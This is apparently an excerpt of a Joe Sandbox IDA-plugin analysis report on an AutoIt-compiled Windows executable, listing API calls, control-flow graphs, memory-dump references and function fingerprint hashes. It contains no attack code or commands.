        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
        • String ID: \*.*
        • API String ID: 2649000838-1173974218
        • Opcode ID: cf4f56ad4637520f417ce693e25b6275581d028e48a5062c943aefc253a0d950
        • Instruction ID: 3c56a6f3371eef96e0e2533653d40312eb770fa7ec04542dc226568f7a1db9c8
        • Opcode Fuzzy Hash: cf4f56ad4637520f417ce693e25b6275581d028e48a5062c943aefc253a0d950
        • Instruction Fuzzy Hash: 4A3181310187859FC304EF65D8958AFB7E8BEA1314F844A1DF4D593192EB30AA59CB63

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 1673 1e42a2-1e42ba CreateStreamOnHGlobal 1674 1e42bc-1e42d3 FindResourceExW 1673->1674 1675 1e42da-1e42dd 1673->1675 1676 1e42d9 1674->1676 1677 2235ba-2235c9 LoadResource 1674->1677 1676->1675 1677->1676 1678 2235cf-2235dd SizeofResource 1677->1678 1678->1676 1679 2235e3-2235ee LockResource 1678->1679 1679->1676 1680 2235f4-2235fc 1679->1680 1681 223600-223612 1680->1681 1681->1676
        APIs
        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,001E50AA,?,?,00000000,00000000), ref: 001E42B2
        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001E50AA,?,?,00000000,00000000), ref: 001E42C9
        • LoadResource.KERNEL32(?,00000000,?,?,001E50AA,?,?,00000000,00000000,?,?,?,?,?,?,001E4F20), ref: 002235BE
        • SizeofResource.KERNEL32(?,00000000,?,?,001E50AA,?,?,00000000,00000000,?,?,?,?,?,?,001E4F20), ref: 002235D3
        • LockResource.KERNEL32(001E50AA,?,?,001E50AA,?,?,00000000,00000000,?,?,?,?,?,?,001E4F20,?), ref: 002235E6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
        • String ID: SCRIPT
        • API String ID: 3051347437-3967369404
        • Opcode ID: 7960cbb65632a4c64f8ce2e7049ca3960c04a080ebb9d9f993afd12f0e23d271
        • Instruction ID: 5f7371a41e0e8d7a6cd1e6a4942e40c3ce86791075182c2deea99f7bedb5deb8
        • Opcode Fuzzy Hash: 7960cbb65632a4c64f8ce2e7049ca3960c04a080ebb9d9f993afd12f0e23d271
        • Instruction Fuzzy Hash: 46118E70200702BFD7218FA6EC48F6B7BB9EBC5B51F24816DF946D6260DB71DC508620
        APIs
        • SetCurrentDirectoryW.KERNEL32(?), ref: 001E2B6B
          • Part of subcall function 001E3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002B1418,?,001E2E7F,?,?,?,00000000), ref: 001E3A78
          • Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD
        • GetForegroundWindow.USER32(runas,?,?,?,?,?,002A2224), ref: 00222C10
        • ShellExecuteW.SHELL32(00000000,?,?,002A2224), ref: 00222C17
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
        • String ID: runas
        • API String ID: 448630720-4000483414
        • Opcode ID: 326791158f899dd9978563d4bc6f2c6542be5086aa50e20d4e2f7b1e49c4f699
        • Instruction ID: cd687bf0232331c3673d09c29dd10042a3c8aa14e7d211bd40315c32e315822d
        • Opcode Fuzzy Hash: 326791158f899dd9978563d4bc6f2c6542be5086aa50e20d4e2f7b1e49c4f699
        • Instruction Fuzzy Hash: F1110A31104BC1ABC714FF62E869DAEB7A8ABB1340F54042CF056170A2DF3189598712
        APIs
        • lstrlenW.KERNEL32(?,00225222), ref: 0024DBCE
        • GetFileAttributesW.KERNELBASE(?), ref: 0024DBDD
        • FindFirstFileW.KERNEL32(?,?), ref: 0024DBEE
        • FindClose.KERNEL32(00000000), ref: 0024DBFA
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: FileFind$AttributesCloseFirstlstrlen
        • String ID:
        • API String ID: 2695905019-0
        • Opcode ID: b4cecb2ab5a503e2f73acab80b293256c9d934a4c7ea51286139183833546b7b
        • Instruction ID: 97931805128835df756d93a575d840d8d34f71e4862d4c265ec949be594b77f1
        • Opcode Fuzzy Hash: b4cecb2ab5a503e2f73acab80b293256c9d934a4c7ea51286139183833546b7b
        • Instruction Fuzzy Hash: 2CF0A0308209105782256FBCEC4D8AA376C9F02334BA0471BF83AC20E0EBB059E48A95

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 0 26aff9-26b056 call 202340 3 26b094-26b098 0->3 4 26b058-26b06b call 1eb567 0->4 5 26b0dd-26b0e0 3->5 6 26b09a-26b0bb call 1eb567 * 2 3->6 14 26b06d-26b092 call 1eb567 * 2 4->14 15 26b0c8 4->15 10 26b0f5-26b119 call 1e7510 call 1e7620 5->10 11 26b0e2-26b0e5 5->11 29 26b0bf-26b0c4 6->29 32 26b11f-26b178 call 1e7510 call 1e7620 call 1e7510 call 1e7620 call 1e7510 call 1e7620 10->32 33 26b1d8-26b1e0 10->33 16 26b0e8-26b0ed call 1eb567 11->16 14->29 20 26b0cb-26b0cf 15->20 16->10 25 26b0d1-26b0d7 20->25 26 26b0d9-26b0db 20->26 25->16 26->5 26->10 29->5 34 26b0c6 29->34 80 26b1a6-26b1d6 GetSystemDirectoryW call 1ffe0b GetSystemDirectoryW 32->80 81 26b17a-26b195 call 1e7510 call 1e7620 32->81 35 26b1e2-26b1fd call 1e7510 call 1e7620 33->35 36 26b20a-26b238 GetCurrentDirectoryW call 1ffe0b GetCurrentDirectoryW 33->36 34->20 35->36 50 26b1ff-26b208 call 204963 35->50 45 26b23c 36->45 48 26b240-26b244 45->48 51 26b246-26b270 call 1e9c6e * 3 48->51 52 26b275-26b285 call 2500d9 48->52 50->36 50->52 51->52 64 26b287-26b289 52->64 65 26b28b-26b2cb call 2507c0 call 2506e6 call 2505a7 52->65 68 26b2ee-26b2f2 64->68 93 26b2d0-26b2e1 65->93 70 26b39a-26b3be CreateProcessW 68->70 71 26b2f8-26b321 call 2411c8 68->71 78 26b3c1-26b3d4 call 1ffe14 * 2 70->78 84 26b323-26b328 call 241201 71->84 85 26b32a call 2414ce 71->85 101 26b3d6-26b3e8 78->101 102 26b42f-26b43d CloseHandle 78->102 80->45 81->80 107 26b197-26b1a0 call 204963 81->107 99 26b32f-26b33c call 204963 84->99 85->99 93->68 100 26b2e3 93->100 115 26b347-26b357 call 204963 99->115 116 26b33e-26b345 99->116 100->68 105 26b3ed-26b3fc 101->105 106 26b3ea 101->106 109 26b43f-26b444 102->109 110 26b49c 102->110 111 26b401-26b42a GetLastError call 1e630c call 1ecfa0 105->111 112 26b3fe 105->112 106->105 107->48 107->80 117 26b446-26b44c CloseHandle 109->117 118 26b451-26b456 109->118 113 26b4a0-26b4a4 110->113 129 26b4e5-26b4f6 call 250175 111->129 112->111 120 26b4a6-26b4b0 113->120 121 26b4b2-26b4bc 113->121 137 26b362-26b372 call 204963 115->137 138 26b359-26b360 115->138 116->115 116->116 117->118 124 26b463-26b468 118->124 125 26b458-26b45e CloseHandle 118->125 120->129 130 26b4c4-26b4e3 call 1ecfa0 CloseHandle 121->130 131 26b4be 121->131 126 26b475-26b481 call 2509d9 124->126 127 26b46a-26b470 CloseHandle 124->127 125->124 141 26b486-26b49a call 26b536 126->141 127->126 130->129 131->130 146 26b374-26b37b 137->146 147 26b37d-26b398 call 1ffe14 * 3 137->147 138->137 138->138 141->113 146->146 146->147 147->78
        APIs
        • _wcslen.LIBCMT ref: 0026B198
        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0026B1B0
        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0026B1D4
        • _wcslen.LIBCMT ref: 0026B200
        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0026B214
        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0026B236
        • _wcslen.LIBCMT ref: 0026B332
          • Part of subcall function 002505A7: GetStdHandle.KERNEL32(000000F6), ref: 002505C6
        • _wcslen.LIBCMT ref: 0026B34B
        • _wcslen.LIBCMT ref: 0026B366
        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0026B3B6
        • GetLastError.KERNEL32(00000000), ref: 0026B407
        • CloseHandle.KERNEL32(?), ref: 0026B439
        • CloseHandle.KERNEL32(00000000), ref: 0026B44A
        • CloseHandle.KERNEL32(00000000), ref: 0026B45C
        • CloseHandle.KERNEL32(00000000), ref: 0026B46E
        • CloseHandle.KERNELBASE(?), ref: 0026B4E3
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
        • String ID:
        • API String ID: 2178637699-0
        • Opcode ID: 48966a861f7a721501e73b16629e8db9a366e3b44b96ce449659ed64a37e76af
        • Instruction ID: d70562705ddb109a02a4cfb97b5ea98c255b9e02a6ec9310c0f9fe9d58b89b69
        • Opcode Fuzzy Hash: 48966a861f7a721501e73b16629e8db9a366e3b44b96ce449659ed64a37e76af
        • Instruction Fuzzy Hash: 5DF1CD316183419FDB15EF24D891B2FBBE0AF85314F14845DF8898B2A2DB31EC95CB92
        APIs
        • GetInputState.USER32 ref: 001ED807
        • timeGetTime.WINMM ref: 001EDA07
        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001EDB28
        • TranslateMessage.USER32(?), ref: 001EDB7B
        • DispatchMessageW.USER32(?), ref: 001EDB89
        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001EDB9F
        • Sleep.KERNELBASE(0000000A), ref: 001EDBB1
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
        • String ID:
        • API String ID: 2189390790-0
        • Opcode ID: 5ba06c609376823bf5d1df317f4ebbbdc2e9a75801f84068facc9e847250c33e
        • Instruction ID: 7f87927a598f218d618c0175b18fb9ecdf51a06a731f31baa68ce2c1e31e6586
        • Opcode Fuzzy Hash: 5ba06c609376823bf5d1df317f4ebbbdc2e9a75801f84068facc9e847250c33e
        • Instruction Fuzzy Hash: 35421570618B82DFD728CF25E888B6EB7E0BF46304F55465DF45687291D770E8A8CB82

        Control-flow Graph

        APIs
        • GetSysColorBrush.USER32(0000000F), ref: 001E2D07
        • RegisterClassExW.USER32(00000030), ref: 001E2D31
        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001E2D42
        • InitCommonControlsEx.COMCTL32(?), ref: 001E2D5F
        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001E2D6F
        • LoadIconW.USER32(000000A9), ref: 001E2D85
        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001E2D94
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
        • API String ID: 2914291525-1005189915
        • Opcode ID: cfb4d88241a1371b586b574841dac22071487e6c0b076114b233953cdb99791b
        • Instruction ID: 004b83cbde086464875fb0626b220fda5b8c4df2379e0238fa4aa05b385a572e
        • Opcode Fuzzy Hash: cfb4d88241a1371b586b574841dac22071487e6c0b076114b233953cdb99791b
        • Instruction Fuzzy Hash: 3F21E3B1951348AFDB00DFA4EC5DBDDBBB8FB08701F20821AF615A62A0D7B10594CF91

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 457 22065b-22068b call 22042f 460 2206a6-2206b2 call 215221 457->460 461 22068d-220698 call 20f2c6 457->461 467 2206b4-2206c9 call 20f2c6 call 20f2d9 460->467 468 2206cb-220714 call 22039a 460->468 466 22069a-2206a1 call 20f2d9 461->466 477 22097d-220983 466->477 467->466 475 220781-22078a GetFileType 468->475 476 220716-22071f 468->476 481 2207d3-2207d6 475->481 482 22078c-2207bd GetLastError call 20f2a3 CloseHandle 475->482 479 220721-220725 476->479 480 220756-22077c GetLastError call 20f2a3 476->480 479->480 486 220727-220754 call 22039a 479->486 480->466 484 2207d8-2207dd 481->484 485 2207df-2207e5 481->485 482->466 496 2207c3-2207ce call 20f2d9 482->496 489 2207e9-220837 call 21516a 484->489 485->489 490 2207e7 485->490 486->475 486->480 500 220847-22086b call 22014d 489->500 501 220839-220845 call 2205ab 489->501 490->489 496->466 507 22087e-2208c1 500->507 508 22086d 500->508 501->500 506 22086f-220879 call 2186ae 501->506 506->477 510 2208e2-2208f0 507->510 511 2208c3-2208c7 507->511 508->506 514 2208f6-2208fa 510->514 515 22097b 510->515 511->510 513 2208c9-2208dd 511->513 513->510 514->515 516 2208fc-22092f CloseHandle call 22039a 514->516 515->477 519 220963-220977 516->519 520 220931-22095d GetLastError call 20f2a3 call 215333 516->520 519->515 520->519
        APIs
          • Part of subcall function 0022039A: CreateFileW.KERNELBASE(00000000,00000000,?,00220704,?,?,00000000,?,00220704,00000000,0000000C), ref: 002203B7
        • GetLastError.KERNEL32 ref: 0022076F
        • __dosmaperr.LIBCMT ref: 00220776
        • GetFileType.KERNELBASE(00000000), ref: 00220782
        • GetLastError.KERNEL32 ref: 0022078C
        • __dosmaperr.LIBCMT ref: 00220795
        • CloseHandle.KERNEL32(00000000), ref: 002207B5
        • CloseHandle.KERNEL32(?), ref: 002208FF
        • GetLastError.KERNEL32 ref: 00220931
        • __dosmaperr.LIBCMT ref: 00220938
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
        • String ID: H
        • API String ID: 4237864984-2852464175
        • Opcode ID: 157d74543157cc80ff68a046460db69eca0c7ec3e057633ce183e4b7bf5cda83
        • Instruction ID: 26d3c27f04a55462958aa6ded823c4d5fbb6e467c939d1fbe219b5fe11d78cf9
        • Opcode Fuzzy Hash: 157d74543157cc80ff68a046460db69eca0c7ec3e057633ce183e4b7bf5cda83
        • Instruction Fuzzy Hash: FBA12A32A201159FDF29EFB8EC957AE7BA0AB46310F14015DF8159B2D2DB319C62CB91

        Control-flow Graph

        APIs
          • Part of subcall function 001E3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002B1418,?,001E2E7F,?,?,?,00000000), ref: 001E3A78
          • Part of subcall function 001E3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001E3379
        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 001E356A
        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0022318D
        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002231CE
        • RegCloseKey.ADVAPI32(?), ref: 00223210
        • _wcslen.LIBCMT ref: 00223277
        • _wcslen.LIBCMT ref: 00223286
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
        • API String ID: 98802146-2727554177
        • Opcode ID: bca0fc7971dd2145e79b54c499392bfe473ea229bcafac23edc5652bc6380f6f
        • Instruction ID: 456cdfa807c3012600ff1ab684a0f35ecf52877922b0a52973a74a4df2847d9c
        • Opcode Fuzzy Hash: bca0fc7971dd2145e79b54c499392bfe473ea229bcafac23edc5652bc6380f6f
        • Instruction Fuzzy Hash: 4471CE71414341EEC314EF66EC898AFBBE8FF95340F504A6EF545931A1EB349A48CB62

        Control-flow Graph

        APIs
        • GetSysColorBrush.USER32(0000000F), ref: 001E2B8E
        • LoadCursorW.USER32(00000000,00007F00), ref: 001E2B9D
        • LoadIconW.USER32(00000063), ref: 001E2BB3
        • LoadIconW.USER32(000000A4), ref: 001E2BC5
        • LoadIconW.USER32(000000A2), ref: 001E2BD7
        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001E2BEF
        • RegisterClassExW.USER32(?), ref: 001E2C40
          • Part of subcall function 001E2CD4: GetSysColorBrush.USER32(0000000F), ref: 001E2D07
          • Part of subcall function 001E2CD4: RegisterClassExW.USER32(00000030), ref: 001E2D31
          • Part of subcall function 001E2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001E2D42
          • Part of subcall function 001E2CD4: InitCommonControlsEx.COMCTL32(?), ref: 001E2D5F
          • Part of subcall function 001E2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001E2D6F
          • Part of subcall function 001E2CD4: LoadIconW.USER32(000000A9), ref: 001E2D85
          • Part of subcall function 001E2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001E2D94
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
        • String ID: #$0$AutoIt v3
        • API String ID: 423443420-4155596026
        • Opcode ID: 72f64b818fbf79b338e0ad05a5967adf37058b6768f56f1d40f5eac07dedea6c
        • Instruction ID: c31604855df607c037c65a46ae0b58eca19ce5ad04a69cee36a23b1ca777e016
        • Opcode Fuzzy Hash: 72f64b818fbf79b338e0ad05a5967adf37058b6768f56f1d40f5eac07dedea6c
        • Instruction Fuzzy Hash: C9214F71E00354ABDB109FA5FC6DAADBFF4FB08B50F54019AE504A66A0E7B10560CF90
        APIs
        • __Init_thread_footer.LIBCMT ref: 001EBB4E
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Init_thread_footer
        • String ID: p#+$p#+$p#+$p#+$p%+$p%+$x#+$x#+
        • API String ID: 1385522511-3692600298
        • Opcode ID: 8c8c4346f09f1436c22bb337855641d77beeef8001e60e0c7e3fd1614cfed56f
        • Instruction ID: 78d087a60ead0c45ff9dd6eb58a2dcef41341811e2e1de1eb1ffc80d84dc356f
        • Opcode Fuzzy Hash: 8c8c4346f09f1436c22bb337855641d77beeef8001e60e0c7e3fd1614cfed56f
        • Instruction Fuzzy Hash: B832FDB0A0864ADFDB24CF55C8E4ABFB7B5EF44300F158099E905AB361C774AD91CBA1

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 805 1e3170-1e3185 806 1e3187-1e318a 805->806 807 1e31e5-1e31e7 805->807 808 1e318c-1e3193 806->808 809 1e31eb 806->809 807->806 810 1e31e9 807->810 811 1e3199-1e319e 808->811 812 1e3265-1e326d PostQuitMessage 808->812 814 222dfb-222e23 call 1e18e2 call 1fe499 809->814 815 1e31f1-1e31f6 809->815 813 1e31d0-1e31d8 DefWindowProcW 810->813 817 1e31a4-1e31a8 811->817 818 222e7c-222e90 call 24bf30 811->818 820 1e3219-1e321b 812->820 819 1e31de-1e31e4 813->819 849 222e28-222e2f 814->849 821 1e321d-1e3244 SetTimer RegisterWindowMessageW 815->821 822 1e31f8-1e31fb 815->822 824 1e31ae-1e31b3 817->824 825 222e68-222e72 call 24c161 817->825 818->820 842 222e96 818->842 820->819 821->820 826 1e3246-1e3251 CreatePopupMenu 821->826 828 222d9c-222d9f 822->828 829 1e3201-1e3214 KillTimer call 1e30f2 call 1e3c50 822->829 832 1e31b9-1e31be 824->832 833 222e4d-222e54 824->833 838 222e77 825->838 826->820 835 222da1-222da5 828->835 836 222dd7-222df6 MoveWindow 828->836 829->820 840 1e31c4-1e31ca 832->840 841 1e3253-1e3263 call 1e326f 832->841 833->813 845 222e5a-222e63 call 240ad7 833->845 843 222dc6-222dd2 SetFocus 835->843 844 222da7-222daa 835->844 836->820 838->820 840->813 840->849 841->820 842->813 843->820 844->840 850 222db0-222dc1 call 1e18e2 844->850 845->813 849->813 853 222e35-222e48 call 1e30f2 call 1e3837 849->853 850->820 853->813
        APIs
        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,001E316A,?,?), ref: 001E31D8
        • KillTimer.USER32(?,00000001,?,?,?,?,?,001E316A,?,?), ref: 001E3204
        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001E3227
        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,001E316A,?,?), ref: 001E3232
        • CreatePopupMenu.USER32 ref: 001E3246
        • PostQuitMessage.USER32(00000000), ref: 001E3267
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
        • String ID: TaskbarCreated
        • API String ID: 129472671-2362178303
        • Opcode ID: e833ef2cc8bea70a00d5f66079f8e44e190d6920af6952cc6a6a0acd2e1b5709
        • Instruction ID: 3dade38c26c789be6cada13f56c9bee6396569811925bd7b33afba9d163ea268
        • Opcode Fuzzy Hash: e833ef2cc8bea70a00d5f66079f8e44e190d6920af6952cc6a6a0acd2e1b5709
        • Instruction Fuzzy Hash: 73418B34220A81B7DB1C2F79BC1DBBD3698E705340F54022DF666872A1DB719A609761
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
